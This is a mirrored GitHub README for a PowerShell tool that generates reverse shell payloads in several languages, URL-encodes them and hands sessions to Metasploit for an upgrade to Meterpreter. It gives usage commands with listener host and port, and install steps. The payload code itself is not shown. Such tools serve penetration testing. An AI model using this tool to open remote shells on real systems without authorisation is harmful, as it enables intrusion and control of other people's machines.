Coder Social home page Coder Social logo

yinxulai / reverseshell Goto Github PK

View Code? Open in Web Editor NEW

This project forked from hackplayers/reverseshell

0.0 1.0 0.0 1.26 MB

A simple PowerShell script that we can use for easing the process of creating a reverse shell and automating Meterpreter update

PowerShell 100.00%

reverseshell's Introduction

ShellReverse

ReverseShell is a simple PowerShell script that we can use for 1/ easing the process of creating a reverse shell (or inverse, as you prefer) with different payloads depending on the interpreter that supports the server (python, bash, perl, java, php or ruby) and 2 / automating the update to Meterpreter.

Usage

Its syntax is very simple:

./shell-reverse.ps1 -Lhost 10.10.10.1 -Lport 4444 -payload -web -metasploit

  • payload: python, python3, bash, perl, php, ruby, java
  • web: encode the payload for URL (encoder)
  • metasploit: start Metasploit and leave it waiting for session to update it to Meterpreter

Install in Debian or Kali

git clone https://github.com/Hackplayers/ReverseShell
cd shellreverse
sudo apt-get update > /dev/null
wget http://http.us.debian.org/debian/pool/main/libu/libunwind/libunwind8_1.1-4.1_amd64.deb 
sudo dpkg -i libunwind8_1.1-4.1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb
sudo dpkg -i  libicu55_55.1-7_amd64.deb
wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb
powershell
./shell-reverse.ps1 -LHOST 192.168.1.20 -LPORT 4444 -Lenguaje

Languaje

   Perl  
   Python  
   Python3  
   Ruby  
   PHP  
   Java  
   Bash  
   Netcat  
   PowershellTCP  
   PowerrshellUDP  
   PowershellICMP  

Video Example

AutoUpdate to Meterpreter

reverseshell's People

Contributors

cybervaca avatar vmotos avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.